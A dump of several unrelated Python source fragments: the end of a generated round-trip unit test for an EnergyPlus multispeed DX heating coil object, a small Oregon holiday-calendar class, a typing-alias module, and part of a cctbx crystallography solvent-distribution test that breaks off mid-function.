var_speed_1_energy_input_ratio_function_of_temperature_curve_name = "object-list|Speed 1 Energy Input Ratio Function of Temperature Curve Name"
obj.speed_1_energy_input_ratio_function_of_temperature_curve_name = var_speed_1_energy_input_ratio_function_of_temperature_curve_name
# object-list
var_speed_1_energy_input_ratio_function_of_flow_fraction_curve_name = "object-list|Speed 1 Energy Input Ratio Function of Flow Fraction Curve Name"
obj.speed_1_energy_input_ratio_function_of_flow_fraction_curve_name = var_speed_1_energy_input_ratio_function_of_flow_fraction_curve_name
# object-list
var_speed_1_part_load_fraction_correlation_curve_name = "object-list|Speed 1 Part Load Fraction Correlation Curve Name"
obj.speed_1_part_load_fraction_correlation_curve_name = var_speed_1_part_load_fraction_correlation_curve_name
# real
var_speed_1_rated_waste_heat_fraction_of_power_input = 0.50005
obj.speed_1_rated_waste_heat_fraction_of_power_input = var_speed_1_rated_waste_heat_fraction_of_power_input
# object-list
var_speed_1_waste_heat_function_of_temperature_curve_name = "object-list|Speed 1 Waste Heat Function of Temperature Curve Name"
obj.speed_1_waste_heat_function_of_temperature_curve_name = var_speed_1_waste_heat_function_of_temperature_curve_name
# real
var_speed_2_gross_rated_heating_capacity = 0.0001
obj.speed_2_gross_rated_heating_capacity = var_speed_2_gross_rated_heating_capacity
# real
var_speed_2_gross_rated_heating_cop = 0.0001
obj.speed_2_gross_rated_heating_cop = var_speed_2_gross_rated_heating_cop
# real
var_speed_2_rated_air_flow_rate = 0.0001
obj.speed_2_rated_air_flow_rate = var_speed_2_rated_air_flow_rate
# real
var_speed_2_rated_supply_air_fan_power_per_volume_flow_rate = 625.0
obj.speed_2_rated_supply_air_fan_power_per_volume_flow_rate = var_speed_2_rated_supply_air_fan_power_per_volume_flow_rate
# object-list
var_speed_2_heating_capacity_function_of_temperature_curve_name = "object-list|Speed 2 Heating Capacity Function of Temperature Curve Name"
obj.speed_2_heating_capacity_function_of_temperature_curve_name = var_speed_2_heating_capacity_function_of_temperature_curve_name
# object-list
var_speed_2_heating_capacity_function_of_flow_fraction_curve_name = "object-list|Speed 2 Heating Capacity Function of Flow Fraction Curve Name"
obj.speed_2_heating_capacity_function_of_flow_fraction_curve_name = var_speed_2_heating_capacity_function_of_flow_fraction_curve_name
# object-list
var_speed_2_energy_input_ratio_function_of_temperature_curve_name = "object-list|Speed 2 Energy Input Ratio Function of Temperature Curve Name"
obj.speed_2_energy_input_ratio_function_of_temperature_curve_name = var_speed_2_energy_input_ratio_function_of_temperature_curve_name
# object-list
var_speed_2_energy_input_ratio_function_of_flow_fraction_curve_name = "object-list|Speed 2 Energy Input Ratio Function of Flow Fraction Curve Name"
obj.speed_2_energy_input_ratio_function_of_flow_fraction_curve_name = var_speed_2_energy_input_ratio_function_of_flow_fraction_curve_name
# object-list
var_speed_2_part_load_fraction_correlation_curve_name = "object-list|Speed 2 Part Load Fraction Correlation Curve Name"
obj.speed_2_part_load_fraction_correlation_curve_name = var_speed_2_part_load_fraction_correlation_curve_name
# real
var_speed_2_rated_waste_heat_fraction_of_power_input = 0.50005
obj.speed_2_rated_waste_heat_fraction_of_power_input = var_speed_2_rated_waste_heat_fraction_of_power_input
# object-list
var_speed_2_waste_heat_function_of_temperature_curve_name = "object-list|Speed 2 Waste Heat Function of Temperature Curve Name"
obj.speed_2_waste_heat_function_of_temperature_curve_name = var_speed_2_waste_heat_function_of_temperature_curve_name
# real
var_speed_3_gross_rated_heating_capacity = 0.0001
obj.speed_3_gross_rated_heating_capacity = var_speed_3_gross_rated_heating_capacity
# real
var_speed_3_gross_rated_heating_cop = 0.0001
obj.speed_3_gross_rated_heating_cop = var_speed_3_gross_rated_heating_cop
# real
var_speed_3_rated_air_flow_rate = 0.0001
obj.speed_3_rated_air_flow_rate = var_speed_3_rated_air_flow_rate
# real
var_speed_3_rated_supply_air_fan_power_per_volume_flow_rate = 625.0
obj.speed_3_rated_supply_air_fan_power_per_volume_flow_rate = var_speed_3_rated_supply_air_fan_power_per_volume_flow_rate
# object-list
var_speed_3_heating_capacity_function_of_temperature_curve_name = "object-list|Speed 3 Heating Capacity Function of Temperature Curve Name"
obj.speed_3_heating_capacity_function_of_temperature_curve_name = var_speed_3_heating_capacity_function_of_temperature_curve_name
# object-list
var_speed_3_heating_capacity_function_of_flow_fraction_curve_name = "object-list|Speed 3 Heating Capacity Function of Flow Fraction Curve Name"
obj.speed_3_heating_capacity_function_of_flow_fraction_curve_name = var_speed_3_heating_capacity_function_of_flow_fraction_curve_name
# object-list
var_speed_3_energy_input_ratio_function_of_temperature_curve_name = "object-list|Speed 3 Energy Input Ratio Function of Temperature Curve Name"
obj.speed_3_energy_input_ratio_function_of_temperature_curve_name = var_speed_3_energy_input_ratio_function_of_temperature_curve_name
# object-list
var_speed_3_energy_input_ratio_function_of_flow_fraction_curve_name = "object-list|Speed 3 Energy Input Ratio Function of Flow Fraction Curve Name"
obj.speed_3_energy_input_ratio_function_of_flow_fraction_curve_name = var_speed_3_energy_input_ratio_function_of_flow_fraction_curve_name
# object-list
var_speed_3_part_load_fraction_correlation_curve_name = "object-list|Speed 3 Part Load Fraction Correlation Curve Name"
obj.speed_3_part_load_fraction_correlation_curve_name = var_speed_3_part_load_fraction_correlation_curve_name
# real
var_speed_3_rated_waste_heat_fraction_of_power_input = 0.50005
obj.speed_3_rated_waste_heat_fraction_of_power_input = var_speed_3_rated_waste_heat_fraction_of_power_input
# object-list
var_speed_3_waste_heat_function_of_temperature_curve_name = "object-list|Speed 3 Waste Heat Function of Temperature Curve Name"
obj.speed_3_waste_heat_function_of_temperature_curve_name = var_speed_3_waste_heat_function_of_temperature_curve_name
# real
var_speed_4_gross_rated_heating_capacity = 0.0001
obj.speed_4_gross_rated_heating_capacity = var_speed_4_gross_rated_heating_capacity
# real
var_speed_4_gross_rated_heating_cop = 0.0001
obj.speed_4_gross_rated_heating_cop = var_speed_4_gross_rated_heating_cop
# real
var_speed_4_rated_air_flow_rate = 0.0001
obj.speed_4_rated_air_flow_rate = var_speed_4_rated_air_flow_rate
# real
var_speed_4_rated_supply_air_fan_power_per_volume_flow_rate = 625.0
obj.speed_4_rated_supply_air_fan_power_per_volume_flow_rate = var_speed_4_rated_supply_air_fan_power_per_volume_flow_rate
# object-list
var_speed_4_heating_capacity_function_of_temperature_curve_name = "object-list|Speed 4 Heating Capacity Function of Temperature Curve Name"
obj.speed_4_heating_capacity_function_of_temperature_curve_name = var_speed_4_heating_capacity_function_of_temperature_curve_name
# object-list
var_speed_4_heating_capacity_function_of_flow_fraction_curve_name = "object-list|Speed 4 Heating Capacity Function of Flow Fraction Curve Name"
obj.speed_4_heating_capacity_function_of_flow_fraction_curve_name = var_speed_4_heating_capacity_function_of_flow_fraction_curve_name
# object-list
var_speed_4_energy_input_ratio_function_of_temperature_curve_name = "object-list|Speed 4 Energy Input Ratio Function of Temperature Curve Name"
obj.speed_4_energy_input_ratio_function_of_temperature_curve_name = var_speed_4_energy_input_ratio_function_of_temperature_curve_name
# object-list
var_speed_4_energy_input_ratio_function_of_flow_fraction_curve_name = "object-list|Speed 4 Energy Input Ratio Function of Flow Fraction Curve Name"
obj.speed_4_energy_input_ratio_function_of_flow_fraction_curve_name = var_speed_4_energy_input_ratio_function_of_flow_fraction_curve_name
# object-list
var_speed_4_part_load_fraction_correlation_curve_name = "object-list|Speed 4 Part Load Fraction Correlation Curve Name"
obj.speed_4_part_load_fraction_correlation_curve_name = var_speed_4_part_load_fraction_correlation_curve_name
# real
var_speed_4_rated_waste_heat_fraction_of_power_input = 0.50005
obj.speed_4_rated_waste_heat_fraction_of_power_input = var_speed_4_rated_waste_heat_fraction_of_power_input
# object-list
var_speed_4_waste_heat_function_of_temperature_curve_name = "object-list|Speed 4 Waste Heat Function of Temperature Curve Name"
obj.speed_4_waste_heat_function_of_temperature_curve_name = var_speed_4_waste_heat_function_of_temperature_curve_name
# alpha
var_zone_name_for_evaporator_placement = "Zone Name for Evaporator Placement"
obj.zone_name_for_evaporator_placement = var_zone_name_for_evaporator_placement
# real
var_speed_1_secondary_coil_air_flow_rate = 0.0001
obj.speed_1_secondary_coil_air_flow_rate = var_speed_1_secondary_coil_air_flow_rate
# real
var_speed_1_secondary_coil_fan_flow_scaling_factor = 0.0001
obj.speed_1_secondary_coil_fan_flow_scaling_factor = var_speed_1_secondary_coil_fan_flow_scaling_factor
# real
var_speed_1_nominal_sensible_heat_ratio_of_secondary_coil = 0.50005
obj.speed_1_nominal_sensible_heat_ratio_of_secondary_coil = var_speed_1_nominal_sensible_heat_ratio_of_secondary_coil
# object-list
var_speed_1_sensible_heat_ratio_modifier_function_of_temperature_curve_name = "object-list|Speed 1 Sensible Heat Ratio Modifier Function of Temperature Curve Name"
obj.speed_1_sensible_heat_ratio_modifier_function_of_temperature_curve_name = var_speed_1_sensible_heat_ratio_modifier_function_of_temperature_curve_name
# object-list
var_speed_1_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = "object-list|Speed 1 Sensible Heat Ratio Modifier Function of Flow Fraction Curve Name"
obj.speed_1_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = var_speed_1_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name
# real
var_speed_2_secondary_coil_air_flow_rate = 0.0001
obj.speed_2_secondary_coil_air_flow_rate = var_speed_2_secondary_coil_air_flow_rate
# real
var_speed_2_secondary_coil_fan_flow_scaling_factor = 0.0001
obj.speed_2_secondary_coil_fan_flow_scaling_factor = var_speed_2_secondary_coil_fan_flow_scaling_factor
# real
var_speed_2_nominal_sensible_heat_ratio_of_secondary_coil = 0.50005
obj.speed_2_nominal_sensible_heat_ratio_of_secondary_coil = var_speed_2_nominal_sensible_heat_ratio_of_secondary_coil
# object-list
var_speed_2_sensible_heat_ratio_modifier_function_of_temperature_curve_name = "object-list|Speed 2 Sensible Heat Ratio Modifier Function of Temperature Curve Name"
obj.speed_2_sensible_heat_ratio_modifier_function_of_temperature_curve_name = var_speed_2_sensible_heat_ratio_modifier_function_of_temperature_curve_name
# object-list
var_speed_2_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = "object-list|Speed 2 Sensible Heat Ratio Modifier Function of Flow Fraction Curve Name"
obj.speed_2_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = var_speed_2_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name
# real
var_speed_3_secondary_coil_air_flow_rate = 0.0001
obj.speed_3_secondary_coil_air_flow_rate = var_speed_3_secondary_coil_air_flow_rate
# real
var_speed_3_secondary_coil_fan_flow_scaling_factor = 0.0001
obj.speed_3_secondary_coil_fan_flow_scaling_factor = var_speed_3_secondary_coil_fan_flow_scaling_factor
# real
var_speed_3_nominal_sensible_heat_ratio_of_secondary_coil = 0.50005
obj.speed_3_nominal_sensible_heat_ratio_of_secondary_coil = var_speed_3_nominal_sensible_heat_ratio_of_secondary_coil
# object-list
var_speed_3_sensible_heat_ratio_modifier_function_of_temperature_curve_name = "object-list|Speed 3 Sensible Heat Ratio Modifier Function of Temperature Curve Name"
obj.speed_3_sensible_heat_ratio_modifier_function_of_temperature_curve_name = var_speed_3_sensible_heat_ratio_modifier_function_of_temperature_curve_name
# object-list
var_speed_3_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = "object-list|Speed 3 Sensible Heat Ratio Modifier Function of Flow Fraction Curve Name"
obj.speed_3_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = var_speed_3_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name
# real
var_speed_4_secondary_coil_air_flow_rate = 0.0001
obj.speed_4_secondary_coil_air_flow_rate = var_speed_4_secondary_coil_air_flow_rate
# real
var_speed_4_secondary_coil_fan_flow_scaling_factor = 0.0001
obj.speed_4_secondary_coil_fan_flow_scaling_factor = var_speed_4_secondary_coil_fan_flow_scaling_factor
# real
var_speed_4_nominal_sensible_heat_ratio_of_secondary_coil = 0.50005
obj.speed_4_nominal_sensible_heat_ratio_of_secondary_coil = var_speed_4_nominal_sensible_heat_ratio_of_secondary_coil
# object-list
var_speed_4_sensible_heat_ratio_modifier_function_of_temperature_curve_name = "object-list|Speed 4 Sensible Heat Ratio Modifier Function of Temperature Curve Name"
obj.speed_4_sensible_heat_ratio_modifier_function_of_temperature_curve_name = var_speed_4_sensible_heat_ratio_modifier_function_of_temperature_curve_name
# object-list
var_speed_4_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = "object-list|Speed 4 Sensible Heat Ratio Modifier Function of Flow Fraction Curve Name"
obj.speed_4_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = var_speed_4_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].name, var_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].availability_schedule_name, var_availability_schedule_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].air_inlet_node_name, var_air_inlet_node_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].air_outlet_node_name, var_air_outlet_node_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].minimum_outdoor_drybulb_temperature_for_compressor_operation, var_minimum_outdoor_drybulb_temperature_for_compressor_operation)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].outdoor_drybulb_temperature_to_turn_on_compressor, var_outdoor_drybulb_temperature_to_turn_on_compressor)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].crankcase_heater_capacity, var_crankcase_heater_capacity)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].maximum_outdoor_drybulb_temperature_for_crankcase_heater_operation, var_maximum_outdoor_drybulb_temperature_for_crankcase_heater_operation)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].defrost_energy_input_ratio_function_of_temperature_curve_name, var_defrost_energy_input_ratio_function_of_temperature_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].maximum_outdoor_drybulb_temperature_for_defrost_operation, var_maximum_outdoor_drybulb_temperature_for_defrost_operation)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].defrost_strategy, var_defrost_strategy)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].defrost_control, var_defrost_control)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].defrost_time_period_fraction, var_defrost_time_period_fraction)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].resistive_defrost_heater_capacity, var_resistive_defrost_heater_capacity)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].apply_part_load_fraction_to_speeds_greater_than_1, var_apply_part_load_fraction_to_speeds_greater_than_1)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].fuel_type, var_fuel_type)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].region_number_for_calculating_hspf, var_region_number_for_calculating_hspf)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].number_of_speeds, var_number_of_speeds)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_gross_rated_heating_capacity, var_speed_1_gross_rated_heating_capacity)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_gross_rated_heating_cop, var_speed_1_gross_rated_heating_cop)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_rated_air_flow_rate, var_speed_1_rated_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_rated_supply_air_fan_power_per_volume_flow_rate, var_speed_1_rated_supply_air_fan_power_per_volume_flow_rate)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_heating_capacity_function_of_temperature_curve_name, var_speed_1_heating_capacity_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_heating_capacity_function_of_flow_fraction_curve_name, var_speed_1_heating_capacity_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_energy_input_ratio_function_of_temperature_curve_name, var_speed_1_energy_input_ratio_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_energy_input_ratio_function_of_flow_fraction_curve_name, var_speed_1_energy_input_ratio_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_part_load_fraction_correlation_curve_name, var_speed_1_part_load_fraction_correlation_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_rated_waste_heat_fraction_of_power_input, var_speed_1_rated_waste_heat_fraction_of_power_input)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_waste_heat_function_of_temperature_curve_name, var_speed_1_waste_heat_function_of_temperature_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_gross_rated_heating_capacity, var_speed_2_gross_rated_heating_capacity)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_gross_rated_heating_cop, var_speed_2_gross_rated_heating_cop)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_rated_air_flow_rate, var_speed_2_rated_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_rated_supply_air_fan_power_per_volume_flow_rate, var_speed_2_rated_supply_air_fan_power_per_volume_flow_rate)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_heating_capacity_function_of_temperature_curve_name, var_speed_2_heating_capacity_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_heating_capacity_function_of_flow_fraction_curve_name, var_speed_2_heating_capacity_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_energy_input_ratio_function_of_temperature_curve_name, var_speed_2_energy_input_ratio_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_energy_input_ratio_function_of_flow_fraction_curve_name, var_speed_2_energy_input_ratio_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_part_load_fraction_correlation_curve_name, var_speed_2_part_load_fraction_correlation_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_rated_waste_heat_fraction_of_power_input, var_speed_2_rated_waste_heat_fraction_of_power_input)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_waste_heat_function_of_temperature_curve_name, var_speed_2_waste_heat_function_of_temperature_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_gross_rated_heating_capacity, var_speed_3_gross_rated_heating_capacity)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_gross_rated_heating_cop, var_speed_3_gross_rated_heating_cop)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_rated_air_flow_rate, var_speed_3_rated_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_rated_supply_air_fan_power_per_volume_flow_rate, var_speed_3_rated_supply_air_fan_power_per_volume_flow_rate)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_heating_capacity_function_of_temperature_curve_name, var_speed_3_heating_capacity_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_heating_capacity_function_of_flow_fraction_curve_name, var_speed_3_heating_capacity_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_energy_input_ratio_function_of_temperature_curve_name, var_speed_3_energy_input_ratio_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_energy_input_ratio_function_of_flow_fraction_curve_name, var_speed_3_energy_input_ratio_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_part_load_fraction_correlation_curve_name, var_speed_3_part_load_fraction_correlation_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_rated_waste_heat_fraction_of_power_input, var_speed_3_rated_waste_heat_fraction_of_power_input)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_waste_heat_function_of_temperature_curve_name, var_speed_3_waste_heat_function_of_temperature_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_gross_rated_heating_capacity, var_speed_4_gross_rated_heating_capacity)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_gross_rated_heating_cop, var_speed_4_gross_rated_heating_cop)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_rated_air_flow_rate, var_speed_4_rated_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_rated_supply_air_fan_power_per_volume_flow_rate, var_speed_4_rated_supply_air_fan_power_per_volume_flow_rate)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_heating_capacity_function_of_temperature_curve_name, var_speed_4_heating_capacity_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_heating_capacity_function_of_flow_fraction_curve_name, var_speed_4_heating_capacity_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_energy_input_ratio_function_of_temperature_curve_name, var_speed_4_energy_input_ratio_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_energy_input_ratio_function_of_flow_fraction_curve_name, var_speed_4_energy_input_ratio_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_part_load_fraction_correlation_curve_name, var_speed_4_part_load_fraction_correlation_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_rated_waste_heat_fraction_of_power_input, var_speed_4_rated_waste_heat_fraction_of_power_input)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_waste_heat_function_of_temperature_curve_name, var_speed_4_waste_heat_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].zone_name_for_evaporator_placement, var_zone_name_for_evaporator_placement)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_secondary_coil_air_flow_rate, var_speed_1_secondary_coil_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_secondary_coil_fan_flow_scaling_factor, var_speed_1_secondary_coil_fan_flow_scaling_factor)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_nominal_sensible_heat_ratio_of_secondary_coil, var_speed_1_nominal_sensible_heat_ratio_of_secondary_coil)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_sensible_heat_ratio_modifier_function_of_temperature_curve_name, var_speed_1_sensible_heat_ratio_modifier_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name, var_speed_1_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_secondary_coil_air_flow_rate, var_speed_2_secondary_coil_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_secondary_coil_fan_flow_scaling_factor, var_speed_2_secondary_coil_fan_flow_scaling_factor)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_nominal_sensible_heat_ratio_of_secondary_coil, var_speed_2_nominal_sensible_heat_ratio_of_secondary_coil)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_sensible_heat_ratio_modifier_function_of_temperature_curve_name, var_speed_2_sensible_heat_ratio_modifier_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name, var_speed_2_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_secondary_coil_air_flow_rate, var_speed_3_secondary_coil_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_secondary_coil_fan_flow_scaling_factor, var_speed_3_secondary_coil_fan_flow_scaling_factor)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_nominal_sensible_heat_ratio_of_secondary_coil, var_speed_3_nominal_sensible_heat_ratio_of_secondary_coil)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_sensible_heat_ratio_modifier_function_of_temperature_curve_name, var_speed_3_sensible_heat_ratio_modifier_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name, var_speed_3_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_secondary_coil_air_flow_rate, var_speed_4_secondary_coil_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_secondary_coil_fan_flow_scaling_factor, var_speed_4_secondary_coil_fan_flow_scaling_factor)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_nominal_sensible_heat_ratio_of_secondary_coil, var_speed_4_nominal_sensible_heat_ratio_of_secondary_coil)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_sensible_heat_ratio_modifier_function_of_temperature_curve_name, var_speed_4_sensible_heat_ratio_modifier_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name, var_speed_4_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name)
|
11547870
|
from ..registry_tools import iso_register
from .core import UnitedStates
@iso_register('US-OR')
class Oregon(UnitedStates):
"""Oregon"""
include_columbus_day = False
|
11547887
|
from typing import Any, Callable, Tuple, Union
Pattern = Union[Callable, Tuple[Callable, Callable], Tuple[Callable, Callable, Callable]]
# This is the Quantizer class instance from torch/quantization/fx/quantize.py.
# Define separately to prevent circular imports.
# TODO(future PR): improve this.
QuantizerCls = Any
|
11547890
|
from __future__ import absolute_import, division, print_function
from cctbx.array_family import flex
import sys
from cctbx import xray
from cctbx import crystal
from mmtbx.max_lik import max_like_non_uniform
from cctbx.development import random_structure
from cctbx.development import debug_utils
#------------------------------------------------------------------------TEST-0
def test_less_one(space_group_info,
volume_per_atom = 100,
d_min = 1.8):
#symmetry = crystal.symmetry(space_group_symbol="p212121")
#space_group_info = symmetry.space_group_info()
#n_sym = space_group_info.type().group().n_smx()
for n_atoms in (1,10):
if(n_atoms == 1):
denom = 16.0
else:
denom = 4.0
for element in ("C","O","N"):
structure = random_structure.xray_structure(
space_group_info=space_group_info,
elements=[element]*n_atoms,
volume_per_atom=volume_per_atom,
random_u_iso=False)
fc = structure.structure_factors(d_min = d_min,
anomalous_flag = False,
algorithm = "fft").f_calc()
manager = max_like_non_uniform.ordered_solvent_distribution(
structure = structure,
fo = fc,
grid_step = fc.d_min()/denom)
f_water_dist = manager.fcalc_from_distribution()
### check phase compatibility with the symmetry:
centrics = f_water_dist.select_centric()
if(centrics.indices().size() > 0):
ideal = centrics.phase_transfer(centrics)
assert flex.max(flex.abs(ideal.data() - centrics.data())) < 1.e-6
###
#print "max = ", flex.max( flex.abs( f_water_dist.data() ) )
#print "min = ", flex.min( flex.abs( f_water_dist.data() ) )
#print "ave = ", flex.mean( flex.abs( f_water_dist.data() ) )
assert flex.max( flex.abs( f_water_dist.data() ) ) < 1.0
#------------------------------------------------------------------------TEST-1
def test_grid_step(n_sites = 50,
volume_per_atom = 50,
d_min = 2.0):
grid_step = (0.2,0.4,0.6,0.7,0.9,1.0)
for step in grid_step:
symmetry = crystal.symmetry(space_group_symbol="P1")
structure = random_structure.xray_structure(space_group_info = symmetry.space_group_info(),
elements=["C"]*n_sites,
volume_per_atom=volume_per_atom,
random_u_iso=False)
fc = structure.structure_factors(d_min = d_min,
anomalous_flag=False,
algorithm="fft").f_calc()
manager = max_like_non_uniform.ordered_solvent_distribution(
structure = structure,
fo = fc,
grid_step = step)
f_water_dist = manager.fcalc_from_distribution()
### check phase compatibility with the symmetry:
centrics = f_water_dist.select_centric()
if(centrics.indices().size() > 0):
ideal = centrics.phase_transfer(centrics)
assert flex.max(flex.abs(ideal.data() - centrics.data())) < 1.e-6
###
#print "max = ", flex.max( flex.abs( f_water_dist.data() ) )
#print "min = ", flex.min( flex.abs( f_water_dist.data() ) )
#print "ave = ", flex.mean( flex.abs( f_water_dist.data() ) )
assert flex.max( flex.abs( f_water_dist.data() ) ) < 1.0
#------------------------------------------------------------------------TEST-2
def test_r(space_group_info,
step = 0.6,
d_min = 4.0):
r = (-1.05,-0.1,0.0,1.05,0.1)
n_sym = space_group_info.type().group().n_smx()
if(n_sym != 8):
for x in r:
for y in r:
for z in r:
symmetry = crystal.symmetry(unit_cell = space_group_info.any_compatible_unit_cell(volume= 2000),
space_group_info = space_group_info)
#symmetry = crystal.symmetry(unit_cell=(11., 12., 13., 75., 85., 95.),
# space_group_symbol="P1")
#symmetry = crystal.symmetry(unit_cell=(11., 12., 13., 90., 90., 90.),
# space_group_symbol="p212121")
structure = xray.structure(crystal_symmetry=symmetry)
scatterer = xray.scatterer(
site = (x,y,z),
u = 0.1,
occupancy = 1.0,
scattering_type = "O")
structure.add_scatterer(scatterer)
fc = structure.structure_factors(d_min = d_min,
anomalous_flag=False,
algorithm="fft").f_calc()
manager = max_like_non_uniform.ordered_solvent_distribution(
structure = structure,
fo = fc,
grid_step = step)
f_water_dist = manager.fcalc_from_distribution()
### check phase compatibility with the symmetry:
centrics = f_water_dist.select_centric()
